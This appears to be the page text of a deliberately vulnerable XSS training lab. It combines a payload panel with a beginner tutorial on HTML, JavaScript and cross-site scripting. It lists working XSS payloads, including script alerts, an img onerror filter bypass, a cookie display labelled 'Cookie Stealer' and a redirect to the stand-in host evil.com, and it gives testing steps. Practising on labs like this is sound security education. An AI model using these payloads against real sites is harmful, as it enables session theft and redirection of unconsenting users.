What's on your mind?
Search Users
Chat
Profile Settings
XSS Testing Tools
Basic Alert
Simple alert popup
<script>alert(1)</script>
Cookie Stealer
Steal cookies from current session
<script>alert(document.cookie)</script>
Image XSS
XSS using image tag
<img src=x onerror=alert(1)>
Learn XSS from Scratch
What is HTML?
HTML (HyperText Markup Language) is the standard markup language for creating web pages. It uses tags to structure content:
HTML Code:
<h1>Hello World</h1>
<p>This is a paragraph</p>
<img src="image.jpg" alt="Description">
Result:
Hello World
This is a paragraph
What is JavaScript?
JavaScript is a programming language that runs in web browsers. It can manipulate HTML elements and perform actions:
JavaScript Code:
alert("Hello World");
document.getElementById("myDiv").innerHTML = "BananaScript";
console.log("Debug message");
Terminal Output:
What is XSS?
Cross-Site Scripting (XSS) occurs when a web application includes untrusted data in a web page without proper validation or escaping. This allows attackers to execute malicious scripts in the victim's browser.
How XSS Works
1. Attacker injects malicious script into a vulnerable input field
2. The script gets stored or reflected back to users
3. When other users view the page, the script executes in their browser
4. The script can steal cookies, redirect users, or perform other malicious actions
Types of XSS
Stored XSS
Malicious script is permanently stored on the server (like in a comment or post)
Reflected XSS
Malicious script is reflected back immediately (like in search results)
DOM-based XSS
Vulnerability exists in client-side code that manipulates the DOM
Common XSS Payloads
Basic Alert
<script>alert('XSS')</script>
Shows a popup alert - good for testing if XSS is possible
Cookie Theft
<script>alert(document.cookie)</script>
Displays all cookies - can be used to steal session tokens
Image XSS
<img src=x onerror=alert('XSS')>
Uses image tag with onerror event - bypasses script tag filters
Redirect
<script>window.location='http://evil.com'</script>
Redirects user to malicious website
How to Test for XSS
- Find input fields that display data back to users
- Try basic payloads like:
- If you see an alert popup, the site is vulnerable
- Try different payloads to bypass filters
- Test if you can steal cookies or redirect users
<script>alert(1)</script>
Practice Areas in This Lab
- Posts: Try XSS in the post content area
- Chat: Send XSS payloads in chat messages
- Search: Use XSS in search queries
- Profile: Try XSS in the name field